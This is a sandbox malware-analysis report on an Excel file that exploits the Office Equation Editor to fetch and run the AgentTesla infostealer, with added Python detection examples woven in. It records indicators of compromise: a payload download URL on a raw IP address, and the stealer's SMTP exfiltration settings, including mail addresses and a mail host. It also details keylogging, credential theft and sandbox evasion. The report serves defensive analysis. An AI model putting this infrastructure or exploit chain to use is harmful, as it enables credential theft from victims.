Analysis Report 0AX4532QWSA.xlsx

Overview

General Information

Sample Name: 0AX4532QWSA.xlsx
Analysis ID: 339305
MD5: 9b4eeaed62b4b0253a7a3205f771099d
SHA1: e7340dd8904b13bf4dbf842c56479ffdb969287c
SHA256: 9bbe5843787cdc023cff31aaa88ce4b91e52e013d5e4b543323b7eea2f5f51d3
Tags: VelvetSweatshop, xlsx

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AntiVM_3
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://191.96.149.225/new.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: vbc.exe.960.5.memstr Malware Configuration Extractor: Agenttesla {"Username: ": "", "URL: ": "", "To: ": "oloyeboos@outlook.com", "ByHost: ": "mail.gammavilla.org:587", "Password: ": "", "From: ": "info@gammavilla.org"}
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00323551
Source: C:\Users\Public\vbc.exe Code function: 4x nop then jmp 00329FDDh 4_2_00329F60
Source: C:\Users\Public\vbc.exe Code function: 4x nop then jmp 00329FDDh 4_2_00329F68
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: mail.gammavilla.org
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 191.96.149.225:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 191.96.149.225:80

Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 217.174.152.38:587
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Jan 2021 19:42:45 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0Last-Modified: Wed, 13 Jan 2021 16:41:58 GMTETag: "c6400-5b8cad158905f"Accept-Ranges: bytesContent-Length: 812032Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 217.174.152.38 217.174.152.38
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEPOINTBG TELEPOINTBG
Source: Joe Sandbox View ASN Name: MAJESTIC-HOSTING-01US MAJESTIC-HOSTING-01US
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 217.174.152.38:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /new.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 191.96.149.225Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C5384863.emf
Source: global traffic HTTP traffic detected: GET /new.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 191.96.149.225Connection: Keep-Alive
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: mail.gammavilla.org
Source: vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp String found in binary or memory: http://127.0.0.1:
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.5.dr String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp String found in binary or memory: http://cps.letsencrypt.org0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000005.00000002.2370524978.0000000006280000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: vbc.exe, 00000005.00000002.2368238555.00000000007FC000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: vbc.exe, 00000005.00000003.2257055628.000000000634D000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.5.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vbc.exe, 00000005.00000003.2257073132.00000000062F0000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp String found in binary or memory: http://gammavilla.org
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp String found in binary or memory: http://mail.gammavilla.org
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp String found in binary or memory: http://r3.i.lencr.org/0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: vbc.exe, 00000004.00000002.2162756537.0000000004E60000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2370083933.0000000005E90000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000005.00000002.2371956308.0000000007B00000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: vbc.exe, 00000004.00000002.2162756537.0000000004E60000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2370083933.0000000005E90000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/U

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\Public\vbc.exe Windows user hook set: 0 keyboard low level C:\Users\Public\vbc.exe
Creates a window with clipboard capturing capabilities
Source: C:\Users\Public\vbc.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Drops certificate files (DER)
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: protected documents the yellow above 25 26 27 28 29 30 31 32 33 34 35 36 37 38 " " " "
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 0AX4532QWSA.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: new[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 4.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 4.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 4.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 4.2.vbc.exe.1310000.2.unpack, ParentalControl/ParentalControl.cs Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 4.2.vbc.exe.1310000.2.unpack, ParentalControl/ParentalControl.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 4.2.vbc.exe.1310000.2.unpack, ParentalControl/ParentalControl.cs Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 5.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 5.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 5.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 5.2.vbc.exe.1310000.1.unpack, ParentalControl/ParentalControl.cs Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 5.2.vbc.exe.1310000.1.unpack, ParentalControl/ParentalControl.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 5.2.vbc.exe.1310000.1.unpack, ParentalControl/ParentalControl.cs Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: new[1].exe.2.dr, ParentalControl/ParentalControl.cs Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: new[1].exe.2.dr, ParentalControl/ParentalControl.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: new[1].exe.2.dr, ParentalControl/ParentalControl.cs Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/12@16/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$0AX4532QWSA.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF47B.tmp
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll (logged 2 times)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor (logged 5 times)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts (logged 2 times)
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts (logged 6 times)
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Users\Public\vbc.exe {path}
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe {path}
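The process creations recorded above are what the "Sigma detected" signatures in this report key on: EQNEDT32.EXE (the Equation Editor, the target of CVE-2017-11882 / CVE-2018-0802) launches vbc.exe from C:\Users\Public, and that vbc.exe then launches a second copy of its own image. The block below is an added example, not part of this report or of Joe Sandbox, that runs equivalent checks in Python over process records constructed from those lines. The record layout, the directory list and the PIDs used for EXCEL.EXE and EQNEDT32.EXE are assumptions; only the vbc.exe PIDs 2688 and 960 appear in the report.

```python
"""Process-tree triage over sandbox-style process-creation records.

Added example, not part of the report. Re-implements in plain Python the gist
of three checks the report attributes to Sigma: an Office equation editor
spawning a child, execution from a folder that should never hold executables,
and a process starting a second copy of its own image (the usual prelude to
hollowing). Field names, the directory list and the Office PIDs are assumptions.
"""
from dataclasses import dataclass
import ntpath  # parses Windows paths correctly on any host


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full path of the new process
    parent_image: str   # full path of the creator, "" if the sandbox saw none
    cmdline: str


# Office helper binaries that have no business launching anything (assumption).
HELPER_PARENTS = {"eqnedt32.exe"}

# User-writable directories that should never hold executables (assumption).
SUSPICIOUS_DIRS = (
    "c:\\users\\public\\",
    "\\appdata\\local\\temp\\",
    "\\temporary internet files\\",
    "c:\\windows\\temp\\",
)


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def helper_spawn(ev: ProcEvent) -> bool:
    """Equation Editor started a child process."""
    return _base(ev.parent_image) in HELPER_PARENTS


def suspicious_location(ev: ProcEvent) -> bool:
    """Image lives in a user-writable, non-program directory."""
    image = ev.image.lower()
    return any(d in image for d in SUSPICIOUS_DIRS)


def self_spawn(ev: ProcEvent) -> bool:
    """Process launched a fresh copy of its own image (hollowing candidate)."""
    return ev.parent_image != "" and ev.image.lower() == ev.parent_image.lower()


CHECKS = {
    "office_helper_spawned_process": helper_spawn,
    "execution_from_suspicious_folder": suspicious_location,
    "self_spawn_possible_hollowing": self_spawn,
}


def triage(events):
    """Return {pid: [names of checks that fired]} for every event with at least one hit."""
    hits = {}
    for ev in events:
        fired = [name for name, check in CHECKS.items() if check(ev)]
        if fired:
            hits[ev.pid] = fired
    return hits


# Constructed from the process lines of this report. PIDs 2688 and 960 are the
# two vbc.exe instances the report names; 1000 and 1001 are placeholders.
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
VBC = r"C:\Users\Public\vbc.exe"

SAMPLE_EVENTS = [
    ProcEvent(1000, 0, EXCEL, "", f"'{EXCEL}' /automation -Embedding"),
    ProcEvent(1001, 0, EQNEDT, "", f"'{EQNEDT}' -Embedding"),
    ProcEvent(2688, 1001, VBC, EQNEDT, f"'{VBC}'"),
    ProcEvent(960, 2688, VBC, VBC, "{path}"),
]

if __name__ == "__main__":
    for pid, fired in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(fired))
```

The two Office processes produce no hits, which is the point of keying on the parent rather than on the child name: vbc.exe is a legitimate Visual Basic compiler binary name, and it is the EQNEDT32.EXE parent plus the C:\Users\Public location that make this launch alertable.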
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: 0AX4532QWSA.xlsx Static file information: File size 1385984 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: 0AX4532QWSA.xlsx Initial sample: OLE indicators vbamacros = False
Source: 0AX4532QWSA.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

.NET source code contains potential unpacker
Source: new[1].exe.2.dr, ParentalControl/ParentalControl.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.1310000.2.unpack, ParentalControl/ParentalControl.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.vbc.exe.1310000.1.unpack, ParentalControl/ParentalControl.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Binary contains a suspicious time stamp
Source: initial sample Static PE information: 0xE7B499BF [Sun Mar 8 17:45:35 2093 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_01147D93 push edi; retf 4_2_01147D9E
Source: C:\Users\Public\vbc.exe Code function: 4_2_01140A9A pushfd ; iretd 4_2_01140AA1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00CA34FC push FFFFFF8Bh; retf 5_2_00CA34FF
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FA174 push ss; ret 5_2_049FA177
Source: initial sample Static PE information: section name: .text entropy: 7.9258080582
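Two of the static indicators above, the link time 0xE7B499BF that decodes to the year 2093 and the 7.93 bits/byte .text section, are cheap to reproduce on any dropped PE. The block below is an added example, not part of this report, that reads IMAGE_FILE_HEADER.TimeDateStamp from a constructed minimal PE header and computes section entropy; the header builder and the packing threshold are mine, the two values being checked come from the report.

```python
"""Static PE triage: compile-timestamp sanity and section entropy.

Added example, not part of the report. Reads the COFF TimeDateStamp the way a
PE parser does and computes the Shannon entropy that packer checks rely on.
The minimal PE header built by build_stub_pe() is constructed for the example;
the timestamp and entropy values come from this report.
"""
import math
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
REPORT_TIMESTAMP = 0xE7B499BF   # value flagged in this report


def pe_timestamp(image: bytes) -> int:
    """Return IMAGE_FILE_HEADER.TimeDateStamp from a PE image (or just its headers)."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # COFF header follows the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    return struct.unpack_from("<I", image, e_lfanew + 8)[0]


def timestamp_to_utc(ts: int) -> datetime:
    # timedelta arithmetic sidesteps platform limits of fromtimestamp() for far-future values
    return EPOCH + timedelta(seconds=ts)


def timestamp_is_suspicious(ts: int, now=None) -> bool:
    """A link time later than 'now' cannot be a genuine build time."""
    now = now or datetime.now(timezone.utc)
    return timestamp_to_utc(ts) > now


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_packed(section: bytes, threshold: float = 7.0) -> bool:
    """Code sections of ordinary compiled binaries sit well below 7 bits/byte;
    compressed or encrypted payloads approach 8 (the report's .text measured 7.93)."""
    return shannon_entropy(section) >= threshold


def build_stub_pe(timestamp: int) -> bytes:
    """Constructed minimal MZ header + PE signature + COFF header, enough for pe_timestamp()."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)        # e_lfanew -> PE signature at 0x40
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 0xE0, 0x102)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    ts = pe_timestamp(build_stub_pe(REPORT_TIMESTAMP))
    print(hex(ts), timestamp_to_utc(ts).isoformat(), "suspicious:", timestamp_is_suspicious(ts))
    print("entropy of 256 distinct bytes:", shannon_entropy(bytes(range(256))))
```

Caveat for .NET samples like this one: Roslyn deterministic builds (the default for SDK-style projects) write a hash of the compiler inputs into TimeDateStamp with the high bit set, which is exactly why such values decode to dates after 2038. A nonsensical link time on a managed assembly is therefore weak evidence on its own; the near-8-bit section entropy together with the in-memory Assembly.Load(byte[]) above is the stronger packer signal.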

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\Public\vbc.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (logged 10 times)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (logged 8 times)
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX (logged 74 times; SetErrorMode with SEM_NOOPENFILEERRORBOX only suppresses the "file not found" dialog and is commonly set by ordinary software, so these entries carry little weight on their own)
Source: 0AX4532QWSA.xlsx Stream path 'EncryptedPackage' entropy: 7.99986275596 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match File source: 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
